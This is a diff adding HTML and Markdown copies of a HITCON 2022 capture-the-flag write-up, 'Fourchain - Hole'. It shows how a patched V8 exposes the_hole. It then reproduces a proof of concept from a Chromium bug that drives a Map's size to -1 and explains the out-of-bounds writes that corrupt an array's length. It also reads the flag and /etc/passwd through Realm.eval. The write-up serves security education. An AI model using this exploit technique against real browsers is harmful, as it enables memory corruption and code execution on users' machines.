+
+
+
+
+
+
+
+```
+
+`hitcon{G00dbY3_1_4_O_h3LL0_Pwn_2_Own_BTW_vB0x_Y_U_N0_SM3P_SM4P_??!!}`
+
+## Table of Contents
+
+- [Prologue](./fourchain-prologue): Introduction
+- [Chapter 1: Hole](./fourchain-hole): Using the "hole" to pwn the V8 heap and some delicious Swiss cheese.
+- [Chapter 2: Sandbox](./fourchain-sandbox): Pwning the Chrome Sandbox using `Sandbox`.
+- [Chapter 3: Kernel](./fourchain-kernel): Chaining the Cross-Cache Cred Change
+- [Chapter 4: Hypervisor](./fourchain-hv): Lord of the MMIO: A Journey to IEM
+- **[Chapter 5: One for All](./fourchain-fullchain) (You are here)**
+- [Epilogue](./fourchain-epilogue): Closing thoughts
\ No newline at end of file
diff --git a/HITCON-2022/pwn/fourchain-hole.html b/HITCON-2022/pwn/fourchain-hole.html
new file mode 100755
index 0000000..4db9a9b
--- /dev/null
+++ b/HITCON-2022/pwn/fourchain-hole.html
@@ -0,0 +1,676 @@
+
+
+
+
+
+Fourchain - Hole | Organisers
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
There’s a hole in the program ?
+Well I’m sure it’s not that of a big deal, after all it’s just a small hole that won’t do any damage right ?
+… Right 😨 ?
+
+
+
Analysis
+
+
NOTE: this writeup assumes some familiarity with V8 internals such as how objects are laid out in memory, pointer compression, and pointer tagging.
+
+
The challenge gives us patched d8, built from v8 commit 63cb7fb817e60e5633fb622baf18c59da7a0a682. There are two patch files included in the challenge:
The second patch, d8_strip_global.patch is simply removing some builtin functions that programs running in d8 normally have access to. These functions let a JavaScript program do things like open and read files, and they would trivialize the challenge if our exploit could use them. This is pretty standard for V8 challenges.
+
+
The first patch, add_hole.patch, is the interesting part. It adds a new method called hole to Array.prototype. The new method is implemented as a C++ builtin, in the function ArrayHole. The function doesn’t do much, and just returns a special value called the_hole.
+
+
the_hole in V8 is a special object that the engine uses internally to represent the absence of a value. For example, when a JavaScript program creates a sparse array, V8 stores the_hole in all uninitialized array slots.
the_hole is an implementation detail that is not part of the JS standard and is normally invisible to JS code. For example if a program tries to access a slot that contains the_hole in a sparse array, the access returns undefined and not the_hole.
+
+
consta=[1,2];
+a[9]=3;
+console.log(a[8]);
+
+
undefined
+
+
+
The author’s patch adds a way to get a reference to this normally inaccessible object from JS code. This is interesting from a security perspective because it’s likely that many of the built-in functions don’t expect to be passed the_hole as an argument and might misbehave when that happens. For example the following snippet crashes d8:
+
+
constthe_hole=[].hole();
+the_hole.toString()
+
+
+
The patch also comments out some code that references a bug in Chromium’s bug tracker. The bug describes how a reference to the_hole can be used to cause memory corruption.
+
+
+
It appears that a leaked TheHole value can be used to cause memory corruption due to special handling of TheHole values in JSMaps:
+
+
varmap=newMap();
+ map.set(1,1);
+ map.set(hole,1);
+ // Due to special handling of hole values, this ends up setting the size of the map to -1
+ map.delete(hole);
+ map.delete(hole);
+ map.delete(1);
+
+ // Size is now -1
+ //print(map.size);
+
+ // Set values in the map, which presumably ends up corrupting data in front of
+ // the map storage due to the size being -1
+ for(leti=0;i<100;i++){
+ map.set(i,1);
+ }
+
+ // Optionally trigger heap verification if the above didn't already crash
+ //gc();
+
+
+
I haven’t verified exactly why this happens, but my guess is that because the TheHole value is used by JSMaps to indicate deleted entries [8], when the code deletes TheHole for the second time, it effectively double-deletes an entry and so decrements the size twice.
+[8] https://source.chromium.org/chromium/chromium/src/+/main:v8/src/builtins/builtins-collections-gen.cc;l=1770;drc=1c3085e26a408adb53645f9b5d12fa9f3803df3c
+
+
+
The check that the challenge author commented out was introduced in response to this bug and breaks the exploitation technique described above. This makes it pretty clear that that’s how the author wants us to solve the challenge.
+
+
Exploitation
+
+
The exploit described in the chromium bug uses the_hole to set the length of a JavaScript map to -1. In order to understand what primitives that gives us we first have to find the code that implements the map object and understand how it works.
+
+
JSMap, the C++ object that represents a JavaScript map is declared in js-collection.tq and it is basically the same as a JSCollection. JSCollection only has one field, called table which points to the backing hash table. Sadly the field has type Object which can point to any JavaScript object. Not very useful. Looking for references to the generated method JSCollection::table() we find some code that indicates that table is actually of type OrderedHashMap. OrderedHashMap is itself a subclass of OrderedHashTable, which has a detailed comment describing how the contents of the table are laid out in memory. Cool!
+
+
The memory layout of a OrderedHashTable (and OrderedHashMap) is this:
+
+
[0]: element count
+[1]: deleted element count
+[2]: bucket count
+[3..(3 + NumberOfBuckets() - 1)]: "hash table",
+ where each item is an offset into the
+ data table (see below) where the first
+ item in this bucket is stored.
+[3 + NumberOfBuckets()..length]: "data table", an
+ array of length Capacity() * 3,
+ where the first entrysize items are
+ handled by the derived class and the
+ item at kChainOffset is another entry
+ into the data table indicating the next
+ entry in this hash bucket.
+
+
+
In our case each element consists of two JavaScript values (the key and the value), so entrysize = 2 and each entry in the hash table will be 3 words (12 bytes) long (key, value, next element).
+
+
In some circumstances the runtime can decide to declare the OrderedHashTable obsolete and create a new version. For example that can happen when too many elements are deleted from the table and the occupancy becomes too low. In that case the first word of the old table is not the element count but rather a pointer to the new OrderedHashTable. We can distinguish between the two by looking at the tag of the first word of the map. A Smi indicates that the map is active, and a pointer indicates that it’s obsolete.
+
+
The layout described above is also prefixed with a pointer to a Map object and with the overall size of the map (in words, which in this case are 4 bytes). The table’s total size is stored right after the map because OrderedHashTable derives from FixedArray, which has a length field. I am pretty sure that this is redundant because the size of the OrderdHashTable is always equal to 3 + num_buckets * 7 but maybe it is stored explicitly to help the GC.
+
+
The value that the exploit in the Chromium bug sets to -1 is the element count (as we can see in the code here, linked to in the bug). We can verify that this is the case by running the code from the Chromium bug and then printing the memory of the map in GDB.
0x1f0400048c7d <Map map = 0x1f04001855f5>
+Thread 1 "d8" received signal SIGTRAP, Trace/breakpoint trap.
+
+pwndbg> x/4wx 0x1f0400048c7c
+ /* map properties elements table */
+0x1f0400048c7c: 0x001855f5 0x00002259 0x00002259 0x00048c8d
+pwndbg> x/4wx 0x1f0400048c8c
+ /* map length next table deleted element count */
+0x1f0400048c8c: 0x00002c29 0x00000022 0x00048cd9 0x00000004
+pwndbg> x/4wx 0x1f0400048cd8
+ /* map length next table deleted element count */
+0x1f0400048cd8: 0x00002c29 0x00000022 0x00048d25 0x00000002
+pwndbg> x/4wx 0x1f0400048d24
+ /* map length element count deleted element count */
+0x1f0400048d24: 0x00002c29 0x00000022 0xfffffffe 0x00000000
+
+
+
As we can see the element count is indeed -1 (whose tagged representation is 0xfffffffe).
+
+
Now how do we exploit this? I searched online for the CVE number referenced in the Chromium bug report (CVE-2021-38003) and found this article by Numen Cyber Labs which has some more details on how to exploit the vulnerability. The article provides a PoC exploit which sets the length of an array to 0xffff.
The way the exploit works is by overwriting the bucket count in the OrderedHashMap with 0x10, which then makes the next insertion into the map write out of bounds. To see why, let’s take a look at the code that implements map insertion. I will include a simplified and commented version here for convenience.
+
+
TF_BUILTIN(MapPrototypeSet,CollectionsBuiltinsAssembler){
+ // ...
+
+ BIND(&add_entry);
+ TVARIABLE(IntPtrT,number_of_buckets);
+ TVARIABLE(IntPtrT,occupancy);
+ TVARIABLE(OrderedHashMap,table_var,table);
+ {
+ // Check we have enough space for the entry.
+ number_of_buckets=SmiUntag(CAST(UnsafeLoadFixedArrayElement(
+ table,OrderedHashMap::NumberOfBucketsIndex())));
+
+ static_assert(OrderedHashMap::kLoadFactor==2);
+ // capacity = number_of_buckets * 2
+ constTNode<WordT>capacity=WordShl(number_of_buckets.value(),1);
+ // Read the number of elememts.
+ constTNode<IntPtrT>number_of_elements=SmiUntag(
+ CAST(LoadObjectField(table,OrderedHashMap::NumberOfElementsOffset())));
+ // Read the number of deleted elements.
+ constTNode<IntPtrT>number_of_deleted=SmiUntag(CAST(LoadObjectField(
+ table,OrderedHashMap::NumberOfDeletedElementsOffset())));
+ // occupancy = number_of_elements + number_of_deleted
+ occupancy=IntPtrAdd(number_of_elements,number_of_deleted);
+ GotoIf(IntPtrLessThan(occupancy.value(),capacity),&store_new_entry);
+
+ // ...
+ }
+ BIND(&store_new_entry);
+ // Store the key, value and connect the element to the bucket chain.
+ StoreOrderedHashMapNewEntry(table_var.value(),key,value,
+ entry_start_position_or_hash.value(),
+ number_of_buckets.value(),occupancy.value());
+ Return(receiver);
+}
+
+voidCollectionsBuiltinsAssembler::StoreOrderedHashMapNewEntry(
+ constTNode<OrderedHashMap>table,constTNode<Object>key,
+ constTNode<Object>value,constTNode<IntPtrT>hash,
+ constTNode<IntPtrT>number_of_buckets,constTNode<IntPtrT>occupancy){
+
+ // bucket = hash & (number_of_buckets - 1)
+ constTNode<IntPtrT>bucket=
+ WordAnd(hash,IntPtrSub(number_of_buckets,IntPtrConstant(1)));
+ // bucket_entry = table[3 + bucket]
+ // this is the index in the data table at which the bucket begins
+ TNode<Smi>bucket_entry=CAST(UnsafeLoadFixedArrayElement(
+ table,bucket,OrderedHashMap::HashTableStartIndex()*kTaggedSize));
+
+ // Store the entry elements.
+ // entry_start = occupancy * 3 + number_of_buckets
+ constTNode<IntPtrT>entry_start=IntPtrAdd(
+ IntPtrMul(occupancy,IntPtrConstant(OrderedHashMap::kEntrySize)),
+ number_of_buckets);
+
+ // table[3 + number_of_buckets + occupancy * 3] = key
+ UnsafeStoreFixedArrayElement(
+ table,entry_start,key,UPDATE_WRITE_BARRIER,
+ kTaggedSize*OrderedHashMap::HashTableStartIndex());
+ // table[3 + number_of_buckets + occupancy * 3 + 1] = value
+ UnsafeStoreFixedArrayElement(
+ table,entry_start,value,UPDATE_WRITE_BARRIER,
+ kTaggedSize*(OrderedHashMap::HashTableStartIndex()+
+ OrderedHashMap::kValueOffset));
+ // table[3 + number_of_buckets + occupancy * 3 + 2] = bucket_entry
+ UnsafeStoreFixedArrayElement(
+ table,entry_start,bucket_entry,
+ kTaggedSize*(OrderedHashMap::HashTableStartIndex()+
+ OrderedHashMap::kChainOffset));
+
+ // Update the bucket head.
+ // table[3 + bucket] = occupancy
+ UnsafeStoreFixedArrayElement(
+ table,bucket,SmiTag(occupancy),
+ OrderedHashMap::HashTableStartIndex()*kTaggedSize);
+
+ // Bump the elements count.
+ // table[0]++
+ constTNode<Smi>number_of_elements=
+ CAST(LoadObjectField(table,OrderedHashMap::NumberOfElementsOffset()));
+ StoreObjectFieldNoWriteBarrier(table,
+ OrderedHashMap::NumberOfElementsOffset(),
+ SmiAdd(number_of_elements,SmiConstant(1)));
+}
+
+
+
After setting number_of_elements to -1 the exploit inserts (0x10, -1) into the table. number_of_buckets is 2 which is the default for new tables. number_of_deleted is 0 because the table got shrunk twice (visible in the memory dump from the previous point), so occupancy will also be -1. The newly-inserted entry is 3 words long and is stored at table[3 + number_of_buckets + occupancy * 3] which in this case is equal to table[2]. That means that the key (0x10) will overwrite the bucket count. The value (-1) will overwrite the pointer to the first bucket, which is fine because -1 indicates an empty bucket. Finally, the element count is incremented, to 0.
+
+
The next time the exploit inserts (a, 0xffff) into the table. This time occupancy is 0 but number_of_buckets is 16, so the new entry gets written at table[19], which is 3 words after the end of the table. This works and doesn’t crash because the code uses UnsafeStoreFixedArrayElement, which does not emit a bounds check to store the entries into the table. So even though the length of the FixedArray that backs the table is known, it’s not checked when inserting new elements.
+
+
The exploit allocates a JavaScript array right after the map, so the new entry will be written 8 bytes into the object that represents this array. The memory layout of a JSArray is the following:
+
+
map: Map
+properties_or_hash: FixedArray
+elements: FixedArray
+length: Number
+
+
+
The inserted pair overwrites elements with the address of the array itself and length with 0xffff. This gives us an arbitrary out-of-bounds read and write on the JavaScript heap.
+
+
V8 Sandbox
+
+
Recent versions of V8 enable the V8 sandbox by default. The goal of the V8 sandbox is to prevent an attacker that has gained arbitrary read and write on the JavaScript heap from corrupting other memory and getting arbitrary code execution in the V8 process. To get the flag we either need to find a bypass for the sandbox. Or we could find a way to get the flag into the sandbox instead.
+
+
As luck would have it, there is a function in d8 which does exactly that and that the author’s patch doesn’t remove from the globals.
+
+
d8 exposes a Realm object which has a function called Realm.eval that can load other JavaScript files. The implementation is here and calls Shell::ReadSource, which in turn calls Shell::ReadFile. This doesn’t directly give us access to the contents of the file that we’re loading but it will still load its contents onto the JavaScript heap, where we can read it using our OOB array. This completely bypasses the need for a V8 sandbox escape as long as we know where the flag is located. By reading /etc/passwd we can see that there is a user called ctf on the server, so we can try /home/ctf/flag. By sheer luck our guess was correct and we could use this method to read the flag.
+
+
+
+
+
+
+
diff --git a/HITCON-2022/pwn/fourchain-hole.md b/HITCON-2022/pwn/fourchain-hole.md
new file mode 100755
index 0000000..a8e6204
--- /dev/null
+++ b/HITCON-2022/pwn/fourchain-hole.md
@@ -0,0 +1,487 @@
+# Fourchain - Hole
+
+**Authors:** [Nspace](https://twitter.com/_MatteoRizzo)
+
+**Tags:** pwn, browser, v8
+
+**Points:** 268
+
+> There's a hole in the program ?
+> Well I'm sure it's not that of a big deal, after all it's just a small hole that won't do any damage right ?
+> ... Right 😨 ?
+
+## Analysis
+
+NOTE: this writeup assumes some familiarity with V8 internals such as how objects are laid out in memory, pointer compression, and pointer tagging.
+
+The challenge gives us patched d8, built from v8 commit `63cb7fb817e60e5633fb622baf18c59da7a0a682`. There are two patch files included in the challenge:
+
+`add_hole.patch`
+```diff
+diff --git a/src/builtins/builtins-array.cc b/src/builtins/builtins-array.cc
+index 6e0cd408e7..aafdfb8544 100644
+--- a/src/builtins/builtins-array.cc
++++ b/src/builtins/builtins-array.cc
+@@ -395,6 +395,12 @@ BUILTIN(ArrayPush) {
+ return *isolate->factory()->NewNumberFromUint((new_length));
+ }
+
++BUILTIN(ArrayHole){
++ uint32_t len = args.length();
++ if(len > 1) return ReadOnlyRoots(isolate).undefined_value();
++ return ReadOnlyRoots(isolate).the_hole_value();
++}
++
+ namespace {
+
+ V8_WARN_UNUSED_RESULT Object GenericArrayPop(Isolate* isolate,
+diff --git a/src/builtins/builtins-collections-gen.cc b/src/builtins/builtins-collections-gen.cc
+index 78b0229011..55aaaa03df 100644
+--- a/src/builtins/builtins-collections-gen.cc
++++ b/src/builtins/builtins-collections-gen.cc
+@@ -1763,7 +1763,7 @@ TF_BUILTIN(MapPrototypeDelete, CollectionsBuiltinsAssembler) {
+ "Map.prototype.delete");
+
+ // This check breaks a known exploitation technique. See crbug.com/1263462
+- CSA_CHECK(this, TaggedNotEqual(key, TheHoleConstant()));
++ //CSA_CHECK(this, TaggedNotEqual(key, TheHoleConstant()));
+
+ const TNode table =
+ LoadObjectField(CAST(receiver), JSMap::kTableOffset);
+diff --git a/src/builtins/builtins-definitions.h b/src/builtins/builtins-definitions.h
+index 0e98586f7f..28a46f2856 100644
+--- a/src/builtins/builtins-definitions.h
++++ b/src/builtins/builtins-definitions.h
+@@ -413,6 +413,7 @@ namespace internal {
+ TFJ(ArrayPrototypeFlat, kDontAdaptArgumentsSentinel) \
+ /* https://tc39.github.io/proposal-flatMap/#sec-Array.prototype.flatMap */ \
+ TFJ(ArrayPrototypeFlatMap, kDontAdaptArgumentsSentinel) \
++ CPP(ArrayHole) \
+ \
+ /* ArrayBuffer */ \
+ /* ES #sec-arraybuffer-constructor */ \
+diff --git a/src/compiler/typer.cc b/src/compiler/typer.cc
+index 79bdfbddcf..c42ad4c789 100644
+--- a/src/compiler/typer.cc
++++ b/src/compiler/typer.cc
+@@ -1722,6 +1722,8 @@ Type Typer::Visitor::JSCallTyper(Type fun, Typer* t) {
+ return Type::Receiver();
+ case Builtin::kArrayUnshift:
+ return t->cache_->kPositiveSafeInteger;
++ case Builtin::kArrayHole:
++ return Type::Oddball();
+
+ // ArrayBuffer functions.
+ case Builtin::kArrayBufferIsView:
+diff --git a/src/init/bootstrapper.cc b/src/init/bootstrapper.cc
+index 9040e95202..a77333287a 100644
+--- a/src/init/bootstrapper.cc
++++ b/src/init/bootstrapper.cc
+@@ -1800,6 +1800,7 @@ void Genesis::InitializeGlobal(Handle global_object,
+ Builtin::kArrayPrototypeFindIndex, 1, false);
+ SimpleInstallFunction(isolate_, proto, "lastIndexOf",
+ Builtin::kArrayPrototypeLastIndexOf, 1, false);
++ SimpleInstallFunction(isolate_, proto, "hole", Builtin::kArrayHole, 0, false);
+ SimpleInstallFunction(isolate_, proto, "pop", Builtin::kArrayPrototypePop,
+ 0, false);
+ SimpleInstallFunction(isolate_, proto, "push", Builtin::kArrayPrototypePush,
+
+```
+
+`d8_strip_global.patch`
+```diff
+diff --git a/src/d8/d8-posix.cc b/src/d8/d8-posix.cc
+index c2571ef3a01..e4f27cfdca6 100644
+--- a/src/d8/d8-posix.cc
++++ b/src/d8/d8-posix.cc
+@@ -734,6 +734,7 @@ char* Shell::ReadCharsFromTcpPort(const char* name, int* size_out) {
+ }
+
+ void Shell::AddOSMethods(Isolate* isolate, Local os_templ) {
++/*
+ if (options.enable_os_system) {
+ os_templ->Set(isolate, "system", FunctionTemplate::New(isolate, System));
+ }
+@@ -748,6 +749,7 @@ void Shell::AddOSMethods(Isolate* isolate, Local os_templ) {
+ FunctionTemplate::New(isolate, MakeDirectory));
+ os_templ->Set(isolate, "rmdir",
+ FunctionTemplate::New(isolate, RemoveDirectory));
++*/
+ }
+
+ } // namespace v8
+diff --git a/src/d8/d8.cc b/src/d8/d8.cc
+index c6bacaa732f..63b3c9c27e8 100644
+--- a/src/d8/d8.cc
++++ b/src/d8/d8.cc
+@@ -3266,6 +3266,7 @@ static void AccessIndexedEnumerator(const PropertyCallbackInfo& info) {}
+
+ Local Shell::CreateGlobalTemplate(Isolate* isolate) {
+ Local global_template = ObjectTemplate::New(isolate);
++ /*
+ global_template->Set(Symbol::GetToStringTag(isolate),
+ String::NewFromUtf8Literal(isolate, "global"));
+ global_template->Set(isolate, "version",
+@@ -3284,6 +3285,7 @@ Local Shell::CreateGlobalTemplate(Isolate* isolate) {
+ FunctionTemplate::New(isolate, ReadLine));
+ global_template->Set(isolate, "load",
+ FunctionTemplate::New(isolate, ExecuteFile));
++ */
+ global_template->Set(isolate, "setTimeout",
+ FunctionTemplate::New(isolate, SetTimeout));
+ // Some Emscripten-generated code tries to call 'quit', which in turn would
+@@ -3456,6 +3458,7 @@ Local Shell::CreateSnapshotTemplate(Isolate* isolate) {
+ }
+ Local Shell::CreateD8Template(Isolate* isolate) {
+ Local d8_template = ObjectTemplate::New(isolate);
++ /*
+ {
+ Local file_template = ObjectTemplate::New(isolate);
+ file_template->Set(isolate, "read",
+@@ -3538,6 +3541,7 @@ Local Shell::CreateD8Template(Isolate* isolate) {
+ Local(), 1));
+ d8_template->Set(isolate, "serializer", serializer_template);
+ }
++ */
+ return d8_template;
+ }
+```
+
+The second patch, `d8_strip_global.patch` is simply removing some builtin functions that programs running in d8 normally have access to. These functions let a JavaScript program do things like open and read files, and they would trivialize the challenge if our exploit could use them. This is pretty standard for V8 challenges.
+
+The first patch, `add_hole.patch`, is the interesting part. It adds a new method called `hole` to `Array.prototype`. The new method is implemented as a C++ builtin, in the function `ArrayHole`. The function doesn't do much, and just returns a special value called `the_hole`.
+
+`the_hole` in V8 is a special object that the engine uses internally to represent the absence of a value. For example, when a JavaScript program creates a sparse array, V8 stores `the_hole` in all uninitialized array slots.
+
+```js
+const a = [1, 2];
+a[9] = 3;
+%DebugPrint(a);
+```
+
+```
+DebugPrint: 0x2ef200108b7d: [JSArray]
+ - elements: 0x2ef200108b8d [HOLEY_SMI_ELEMENTS]
+ - length: 10
+ - elements: 0x2ef200108b8d {
+ 0: 1
+ 1: 2
+ 2-8: 0x2ef200002459
+ 9: 3
+ 10-30: 0x2ef200002459
+ }
+```
+
+`the_hole` is an implementation detail that is not part of the JS standard and is normally invisible to JS code. For example if a program tries to access a slot that contains `the_hole` in a sparse array, the access returns `undefined` and not `the_hole`.
+
+```js
+const a = [1, 2];
+a[9] = 3;
+console.log(a[8]);
+```
+```
+undefined
+```
+
+The author's patch adds a way to get a reference to this normally inaccessible object from JS code. This is interesting from a security perspective because it's likely that many of the built-in functions don't expect to be passed `the_hole` as an argument and might misbehave when that happens. For example the following snippet crashes d8:
+
+```js
+const the_hole = [].hole();
+the_hole.toString()
+```
+
+The patch also comments out some code that references [a bug](https://bugs.chromium.org/p/chromium/issues/detail?id=1263462) in Chromium's bug tracker. The bug describes how a reference to `the_hole` can be used to cause memory corruption.
+
+> It appears that a leaked TheHole value can be used to cause memory corruption due to special handling of TheHole values in JSMaps:
+>
+> ```js
+> var map = new Map();
+> map.set(1, 1);
+> map.set(hole, 1);
+> // Due to special handling of hole values, this ends up setting the size of the map to -1
+> map.delete(hole);
+> map.delete(hole);
+> map.delete(1);
+>
+> // Size is now -1
+> //print(map.size);
+>
+> // Set values in the map, which presumably ends up corrupting data in front of
+> // the map storage due to the size being -1
+> for (let i = 0; i < 100; i++) {
+> map.set(i, 1);
+> }
+>
+> // Optionally trigger heap verification if the above didn't already crash
+> //gc();
+> ```
+>
+> I haven't verified exactly why this happens, but my guess is that because the TheHole value is used by JSMaps to indicate deleted entries [8], when the code deletes TheHole for the second time, it effectively double-deletes an entry and so decrements the size twice.
+> [8] https://source.chromium.org/chromium/chromium/src/+/main:v8/src/builtins/builtins-collections-gen.cc;l=1770;drc=1c3085e26a408adb53645f9b5d12fa9f3803df3c
+
+The check that the challenge author commented out was introduced in response to this bug and breaks the exploitation technique described above. This makes it pretty clear that that's how the author wants us to solve the challenge.
+
+## Exploitation
+
+The exploit described in the chromium bug uses `the_hole` to set the length of a JavaScript map to -1. In order to understand what primitives that gives us we first have to find the code that implements the map object and understand how it works.
+
+`JSMap`, the C++ object that represents a JavaScript map is declared in [`js-collection.tq`](https://source.chromium.org/chromium/chromium/src/+/main:v8/src/objects/js-collection.tq;l=11;drc=f30f4815254b8eed9b23026ea0d984d18bb89c28) and it is basically the same as a `JSCollection`. `JSCollection` only has one field, called `table` which points to the backing hash table. Sadly the field has type `Object` which can point to any JavaScript object. Not very useful. Looking for references to the generated method `JSCollection::table()` we find [some code](https://source.chromium.org/chromium/chromium/src/+/main:v8/src/objects/objects.cc;l=6556;drc=2df668b7cbf6c1d0766b6ee0ae8147adc8830f2e) that indicates that `table` is actually of type [`OrderedHashMap`](https://source.chromium.org/chromium/chromium/src/+/main:v8/src/objects/ordered-hash-table.h;l=306;drc=2df668b7cbf6c1d0766b6ee0ae8147adc8830f2e). `OrderedHashMap` is itself a subclass of `OrderedHashTable`, which has a [detailed comment](https://source.chromium.org/chromium/chromium/src/+/main:v8/src/objects/ordered-hash-table.h;l=23;drc=2df668b7cbf6c1d0766b6ee0ae8147adc8830f2e) describing how the contents of the table are laid out in memory. Cool!
+
+The memory layout of a `OrderedHashTable` (and `OrderedHashMap`) is this:
+
+```
+[0]: element count
+[1]: deleted element count
+[2]: bucket count
+[3..(3 + NumberOfBuckets() - 1)]: "hash table",
+ where each item is an offset into the
+ data table (see below) where the first
+ item in this bucket is stored.
+[3 + NumberOfBuckets()..length]: "data table", an
+ array of length Capacity() * 3,
+ where the first entrysize items are
+ handled by the derived class and the
+ item at kChainOffset is another entry
+ into the data table indicating the next
+ entry in this hash bucket.
+```
+
+In our case each element consists of two JavaScript values (the key and the value), so entrysize = 2 and each entry in the hash table will be 3 words (12 bytes) long (key, value, next element).
+
+In some circumstances the runtime can decide to declare the `OrderedHashTable` obsolete and create a new version. For example that can happen when too many elements are deleted from the table and the occupancy becomes too low. In that case the first word of the old table is not the element count but rather a pointer to the new `OrderedHashTable`. We can distinguish between the two by looking at the tag of the first word of the map. A Smi indicates that the map is active, and a pointer indicates that it's obsolete.
+
+The layout described above is also prefixed with a pointer to a [Map](https://source.chromium.org/chromium/chromium/src/+/main:v8/src/objects/map.h;l=203;drc=2df668b7cbf6c1d0766b6ee0ae8147adc8830f2e) object and with the overall size of the map (in words, which in this case are 4 bytes). The table's total size is stored right after the map because `OrderedHashTable` derives from [`FixedArray`](https://source.chromium.org/chromium/chromium/src/+/main:v8/src/objects/fixed-array.tq;l=8;drc=902759b8d72534a01d0f90d6653fd253885cf72f), which has a `length` field. I am pretty sure that this is redundant because the size of the `OrderdHashTable` is always equal to `3 + num_buckets * 7` but maybe it is stored explicitly to help the GC.
+
+The value that the exploit in the Chromium bug sets to -1 is the element count (as we can see in the code [here](https://source.chromium.org/chromium/chromium/src/+/main:v8/src/builtins/builtins-collections-gen.cc;l=1710;drc=63cb7fb817e60e5633fb622baf18c59da7a0a682), linked to in the bug). We can verify that this is the case by running the code from the Chromium bug and then printing the memory of the map in GDB.
+
+```js
+let hole = [].hole();
+let map = new Map();
+
+map.set(1, 1);
+map.set(hole, 1);
+map.delete(hole);
+map.delete(hole);
+map.delete(1);
+
+%DebugPrint(map);
+%SystemBreak();
+```
+```
+0x1f0400048c7d